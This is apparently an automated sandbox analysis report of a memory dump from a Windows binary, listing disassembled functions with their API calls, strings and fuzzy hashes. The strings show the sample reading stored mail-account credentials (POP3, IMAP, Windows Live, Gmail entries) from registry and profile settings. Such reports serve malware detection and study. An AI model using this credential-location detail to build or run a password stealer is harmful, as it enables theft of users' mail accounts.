                                                                                                                                                                                    • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                                                                                    • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                                                                                    • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                                                                                    Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • out of memory, xrefs: 0042EBEF
                                                                                                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                                                                                    • database %s is already in use, xrefs: 0042E9CE
                                                                                                                                                                                    • database is already attached, xrefs: 0042EA97
                                                                                                                                                                                    • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                                                                                    • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                                                                                                    • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                    • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                                                                                                                    • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                                                                    • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                                                                                                    Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                    • API String ID: 1348940319-1729847305
                                                                                                                                                                                    • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                    • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                                                                                    • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                                                                                    Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                                                                    • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                                                                    • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                                                                                    • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                    • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                                                                                    • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                    • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                                                                                    Function 0040F96C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                    • memset.MSVCRT ref: 0040FA1E
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                                                                                    • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                    • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                    • API String ID: 945165440-3589380929
                                                                                                                                                                                    • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                    • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                                                                                                    • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                    • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                                                                                                    Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                      • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                      • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                      • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040371F
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                                                    • strlen.MSVCRT ref: 00403778
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                                    • String ID: %s@gmail.com
                                                                                                                                                                                    • API String ID: 3261640601-4097000612
                                                                                                                                                                                    • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                                                                                    • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                                                                                    • Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                                                                                                    Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004094C8
                                                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                                                    • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                                                    • memset.MSVCRT ref: 0040950C
                                                                                                                                                                                    • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                    • String ID: sysdatetimepick32
                                                                                                                                                                                    • API String ID: 3411445237-4169760276
                                                                                                                                                                                    • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                                                                                    • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                                                                                    Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                                                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                                                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                                                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3642520215-0
                                                                                                                                                                                    • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                    • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                                                                                    Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                                                    • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                                                                                                    • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                                                                                                    • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                                                    • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                                                    • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1999381814-0
                                                                                                                                                                                    • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                    • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                    • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                                                                    Function 004261F7 Relevance: 10.9, APIs: 2, Strings: 5, Instructions: 443COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                    • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                    • API String ID: 1297977491-3883738016
                                                                                                                                                                                    • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                    • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                                                                    Function 00449630 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                                                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                      • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                                                      • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset
                                                                                                                                                                                    • String ID: gj
                                                                                                                                                                                    • API String ID: 438689982-4203073231
                                                                                                                                                                                    • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                    • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                                                                                    • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                    • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                                                                                    Function 00405810 Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                                                                                    • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                                                                                    • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                                                                                    • memset.MSVCRT ref: 004058C3
                                                                                                                                                                                    • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                                                                                    • SetFocus.USER32(?), ref: 00405976
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4281309102-0
                                                                                                                                                                                    • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                    • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                                                                                                    Function 0040A83A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,761F0A60,00000000,?,?,0040A7BE,00000001,0044CBC0,761F0A60), ref: 00406D4D
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040A921
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                    • API String ID: 1631269929-4153097237
                                                                                                                                                                                    • Opcode ID: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                                                                                                    • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                                                                                                    • Opcode Fuzzy Hash: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                                                                                                    • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                                                                                                    Function 004080ED Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040810E
                                                                                                                                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,7639E430,?), ref: 004081B9
                                                                                                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                    • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                    • API String ID: 524865279-2190619648
                                                                                                                                                                                    • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                                                                                    • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                                                                                    Function 004093B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000084.00000002.21795504727.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                    • API String ID: 2300387033-3849865405
                                                                                                                                                                                    • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                                                                                    • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                                                                                    • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                                                                                    Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004076D7
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                    • strlen.MSVCRT ref: 00407710
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                    • strlen.MSVCRT ref: 00407733
                                                                                                                                                                                    • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
